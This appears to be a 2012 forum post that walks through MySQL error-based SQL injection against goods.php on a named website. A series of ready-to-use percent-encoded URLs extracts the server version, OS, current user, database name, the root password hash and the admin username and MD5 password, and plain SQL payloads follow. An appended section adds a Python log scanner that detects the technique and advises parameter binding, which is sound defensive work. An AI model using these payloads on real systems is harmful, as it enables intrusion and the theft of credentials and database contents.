Blind injection in detail

Posted by the original poster on 2012-9-5 14:59:30
Determine the version number

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Table names in the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

The user_name column in the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

The password column in the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Obtain the admin password (MD5)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Error-based injection

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
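Every payload in this post, both the percent-encoded goods.php URLs and the plain SQL under "Error-based injection", is the same MySQL trick: an aggregate count(*), a GROUP BY key built from concat(<subquery>, floor(rand()*2)), and the resulting "Duplicate entry ... for key 'group_key'" error carrying the subquery's value back in the error text. Those three building blocks make the attempts easy to spot in web server logs. The following is an added detection example written for this thread, not code from the original post; the access log lines, IP addresses and response sizes are constructed for illustration, and the path and host are placeholders, not the target named above.

```python
"""Flag MySQL error-based (floor(rand()*2) + GROUP BY) injection attempts in access logs.

Added example for this thread, not code from the original post.  The log lines,
client IPs and response sizes below are constructed; the vulnerable endpoint
/goods.php is reused only as a path name.
"""
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-style log lines (hypothetical traffic, not real captures).
SAMPLE_LOG = """\
203.0.113.5 - - [05/Sep/2012:14:59:30 +0800] "GET /goods.php?id=352&wsid=1 HTTP/1.1" 200 5123
203.0.113.5 - - [05/Sep/2012:14:59:41 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 412
198.51.100.9 - - [05/Sep/2012:15:02:10 +0800] "GET /search.php?q=rand%20floor HTTP/1.1" 200 2200
203.0.113.5 - - [05/Sep/2012:15:03:02 +0800] "GET /goods.php?id=-1%20union%20select%201,(select%201%20from(select%20count(*),concat((select%20user()),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 412
"""

# Minimal combined-log-format parser: client IP, timestamp, method, request path, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The technique needs all three pieces in one query; requiring all of them keeps
# ordinary search terms such as "rand floor" from producing false positives.
SIGNATURE_PARTS = (
    re.compile(r'count\s*\(\s*\*\s*\)', re.I),                               # aggregate
    re.compile(r'floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)', re.I),    # floor(rand()*2) / floor(rand(0)*2)
    re.compile(r'group\s+by', re.I),                                         # duplicate group key
)

# The value the attacker wants leaked is the first argument of concat(): "concat((select X),".
TARGET_RE = re.compile(r'concat\(\s*\(\s*select\s+(.+?)\s*\)\s*,', re.I)


def parse_request(line):
    """Return a dict for one log line, with the request path percent-decoded, or None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    # Payloads arrive encoded (%20, %3E, %23); match on the decoded form.
    req['decoded'] = unquote_plus(req['path'])
    return req


def is_error_based_payload(decoded_path):
    """True when the decoded query string contains all three signature parts."""
    return all(p.search(decoded_path) for p in SIGNATURE_PARTS)


def extracted_target(decoded_path):
    """Best-effort extraction of the subquery whose value the payload tries to leak."""
    m = TARGET_RE.search(decoded_path)
    return m.group(1).strip() if m else None


def find_error_based_injection(log_text):
    """Scan a log and return one finding per request matching the signature."""
    findings = []
    for line in log_text.splitlines():
        req = parse_request(line)
        if req and is_error_based_payload(req['decoded']):
            findings.append({
                'ip': req['ip'],
                'time': req['ts'],
                'endpoint': req['path'].split('?', 1)[0],
                'status': int(req['status']),
                'target': extracted_target(req['decoded']),
            })
    return findings


if __name__ == '__main__':
    for f in find_error_based_injection(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['endpoint']} status={f['status']} leaks={f['target']}")
```

Two points worth noting when running this over real logs. The technique only works when the database error text reaches the HTTP response, so a 500 status (or an unusually small 200 body) on the flagged request is corroborating evidence that the leak succeeded, and the fix on the application side is to stop the query from ever being assembled from raw input: `goods.php` accepts `id` and `wsid` as integers, so casting them or binding them as parameters removes the injection point regardless of how the payload is encoded.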